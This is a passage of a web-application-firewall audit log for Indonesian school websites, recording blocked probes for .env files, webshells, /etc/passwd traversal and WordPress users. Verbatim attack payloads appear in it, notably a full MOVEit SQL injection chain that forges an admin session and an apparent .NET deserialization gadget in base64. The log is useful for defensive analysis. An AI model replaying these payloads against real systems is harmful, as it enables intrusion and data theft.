YzU2MTkzNGUwODldLFtTeXN0ZW0uQm9vbGVhbiwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZqAAAAHlN5c3RlbS5Db2xsZWN0aW9ucy5JRW51bWVyYXRvcgZrAAAACE1vdmVOZXh0CgFJAAAAQwAAAAlrAAAACT4AAAAJagAAAAZuAAAAEkJvb2xlYW4gTW92ZU5leHQoKQZvAAAAGVN5c3RlbS5Cb29sZWFuIE1vdmVOZXh0KCkIAAAACgFKAAAAQgAAAAZwAAAAvQJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABnIAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQZzAAAAC2dldF9DdXJyZW50CgFLAAAAQwAAAAlzAAAACT4AAAAJcgAAAAZ2AAAAGVN5c3RlbS5UeXBlIGdldF9DdXJyZW50KCkGdwAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpCAAAAAoBTAAAAEIAAAAGeAAAAMYBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGegAAABBTeXN0ZW0uQWN0aXZhdG9yBnsAAAAOQ3JlYXRlSW5zdGFuY2UKAU0AAABDAAAACXsAAAAJPgAAAAl6AAAABn4AAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkGfwAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS5UeXBlKQgAAAAKAU4AAAAPAAAABoAAAAAmU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5Db21tYW5kSUQEAAAACToAAAAQTwAAAAIAAAAJggAAAAgIACAAAASCAAAAC1N5c3RlbS5HdWlkCwAAAAJfYQJfYgJfYwJfZAJfZQJfZgJfZwJfaAJfaQJfagJfawAAAAAAAAAAAAAACAcHAgICAgICAgITE9J07irREYv7AKDJDyb3Cws=","format":"3"} --7bbc6d6c-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --7bbc6d6c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=text/json"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747927414173823 5876 (- - -) Stopwatch2: 1747927414173823 5876; combined=3809, p1=648, p2=2997, p3=34, p4=37, p5=92, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7bbc6d6c-Z-- --17801f03-A-- [22/May/2025:23:47:06 +0700] aC9VCuThJmFSRJ5-OZfodwAAAEQ 103.236.140.4 59116 103.236.140.4 8181 --17801f03-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90) Accept-Charset: utf-8 --17801f03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --17801f03-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747932426758288 695 (- - -) Stopwatch2: 1747932426758288 695; combined=260, p1=226, p2=0, p3=0, p4=0, p5=34, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17801f03-Z-- --6cd32a09-A-- [22/May/2025:23:47:25 +0700] aC9VHWfriXjg62qQwE9snwAAAJE 103.236.140.4 59152 103.236.140.4 8181 --6cd32a09-B-- GET /images/stories/radio.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 152.42.171.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.42.171.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Team Anon Force Accept: */* --6cd32a09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6cd32a09-H-- Message: Access denied with code 403 (phase 2). String match ".php" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747932445191603 2019 (- - -) Stopwatch2: 1747932445191603 2019; combined=935, p1=326, p2=581, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6cd32a09-Z-- --3d31e422-A-- [22/May/2025:23:47:34 +0700] aC9VJuThJmFSRJ5-OZfoigAAAFM 103.236.140.4 59168 103.236.140.4 8181 --3d31e422-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --3d31e422-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d31e422-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747932454562071 671 (- - -) Stopwatch2: 1747932454562071 671; combined=274, p1=244, p2=0, p3=0, p4=0, p5=30, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d31e422-Z-- --5b61df70-A-- [22/May/2025:23:50:25 +0700] aC9V0eThJmFSRJ5-OZfo7AAAAEA 103.236.140.4 59416 103.236.140.4 8181 --5b61df70-B-- GET /images/stories/wso.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 152.42.171.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.42.171.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Team Anon Force Accept: */* --5b61df70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5b61df70-H-- Message: Access denied with code 403 (phase 2). String match ".php" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747932625234670 14639 (- - -) Stopwatch2: 1747932625234670 14639; combined=26384, p1=308, p2=544, p3=0, p4=0, p5=12812, sr=65, sw=0, l=0, gc=12720 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5b61df70-Z-- --840dbb77-A-- [22/May/2025:23:53:10 +0700] aC9WduThJmFSRJ5-OZfpSQAAAFA 103.236.140.4 59672 103.236.140.4 8181 --840dbb77-B-- GET /images/stories/spy.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 152.42.171.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.42.171.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Team Anon Force Accept: */* --840dbb77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --840dbb77-H-- Message: Access denied with code 403 (phase 2). String match ".php" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747932790557278 1842 (- - -) Stopwatch2: 1747932790557278 1842; combined=891, p1=308, p2=556, p3=0, p4=0, p5=27, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --840dbb77-Z-- --4195393d-A-- [22/May/2025:23:55:40 +0700] aC9XDOThJmFSRJ5-OZfpkQAAAEU 103.236.140.4 59848 103.236.140.4 8181 --4195393d-B-- GET /?umbrella-restore=1&filename=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 163523548 --4195393d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4195393d-E-- --4195393d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?umbrella-restore=1&filename=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747932940904948 2110 (- - -) Stopwatch2: 1747932940904948 2110; combined=602, p1=418, p2=154, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4195393d-Z-- --745a284e-A-- [23/May/2025:00:00:26 +0700] aC9YKuThJmFSRJ5-OZfpogAAAFc 103.236.140.4 59912 103.236.140.4 8181 --745a284e-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.148.10.172 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.148.10.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 Accept-Charset: utf-8 --745a284e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --745a284e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747933226613213 906 (- - -) Stopwatch2: 1747933226613213 906; combined=330, p1=284, p2=0, p3=0, p4=0, p5=46, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --745a284e-Z-- --6168b60b-A-- [23/May/2025:00:13:17 +0700] aC9bLeThJmFSRJ5-OZfpuwAAAEY 103.236.140.4 60044 103.236.140.4 8181 --6168b60b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 46.29.224.18 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 46.29.224.18 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6168b60b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6168b60b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747933997640391 2150 (- - -) Stopwatch2: 1747933997640391 2150; combined=982, p1=342, p2=613, p3=0, p4=0, p5=27, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6168b60b-Z-- --68c72c62-A-- [23/May/2025:00:32:25 +0700] aC9fqSektx75wRFPQygHDQAAANQ 103.236.140.4 60242 103.236.140.4 8181 --68c72c62-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: SonyEricssonK750i/R1CA Browser/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Accept-Charset: utf-8 --68c72c62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68c72c62-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747935145302568 934 (- - -) Stopwatch2: 1747935145302568 934; combined=349, p1=291, p2=0, p3=0, p4=0, p5=58, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68c72c62-Z-- --82140113-A-- [23/May/2025:00:37:58 +0700] aC9g9uThJmFSRJ5-OZfp2AAAAFE 103.236.140.4 60272 103.236.140.4 8181 --82140113-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.83.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.83.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36 Accept-Charset: utf-8 --82140113-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82140113-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747935478029370 736 (- - -) Stopwatch2: 1747935478029370 736; combined=285, p1=252, p2=0, p3=0, p4=0, p5=33, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82140113-Z-- --c08e8a01-A-- [23/May/2025:00:39:57 +0700] aC9hbeThJmFSRJ5-OZfp3AAAAEE 103.236.140.4 60284 103.236.140.4 8181 --c08e8a01-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 203.176.129.61 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.176.129.61 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c08e8a01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c08e8a01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747935597793798 2947 (- - -) Stopwatch2: 1747935597793798 2947; combined=1280, p1=460, p2=790, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c08e8a01-Z-- --f79f9a41-A-- [23/May/2025:00:52:50 +0700] aC9kciektx75wRFPQygHKQAAANM 103.236.140.4 60420 103.236.140.4 8181 --f79f9a41-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36 Accept-Charset: utf-8 --f79f9a41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f79f9a41-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747936370144292 838 (- - -) Stopwatch2: 1747936370144292 838; combined=340, p1=295, p2=0, p3=0, p4=0, p5=45, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f79f9a41-Z-- --96c96a62-A-- [23/May/2025:01:08:36 +0700] aC9oJH0O04WKE1HJ5iR7igAAABc 103.236.140.4 32932 103.236.140.4 8181 --96c96a62-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15 Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyUsername: Guest X-siLock-SessVar1: MyPkgAccessCode: 123 X-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com X-siLock-Transaction: session_setvars X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: siLockLongTermInstID=0; SenayanMember=c7copsa976qr9ectsiv2cj1713 X-Varnish: 163523812 --96c96a62-C-- --96c96a62-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --96c96a62-E-- --96c96a62-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747937316123761 3402 (- - -) Stopwatch2: 1747937316123761 3402; combined=1684, p1=493, p2=1159, p3=0, p4=0, p5=32, sr=83, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --96c96a62-Z-- --d558aa41-A-- [23/May/2025:01:08:39 +0700] aC9oJ-ThJmFSRJ5-OZfqCgAAAE8 103.236.140.4 32942 103.236.140.4 8181 --d558aa41-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: python-requests/2.26.0 Accept: */* Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyPkgID: 0 X-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('2xMkyuOd6a871djR3qUJHUPPvjy');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET InstId='1234' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET IpAddress='154.26.179.43' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET Timeout='60' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET ResilNode='10' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET AcctReady='1' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy'; -- asdf X-siLock-Transaction: session_setvars X-Forwarded-For: 154.26.179.43 Cookie: siLockLongTermInstID=0; SenayanMember=c7copsa976qr9ectsiv2cj1713 X-Varnish: 163523815 --d558aa41-C-- --d558aa41-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d558aa41-E-- --d558aa41-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747937319138757 2374 (- - -) Stopwatch2: 1747937319138757 2374; combined=1261, p1=317, p2=918, p3=0, p4=0, p5=26, sr=60, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d558aa41-Z-- --0b7ff339-A-- 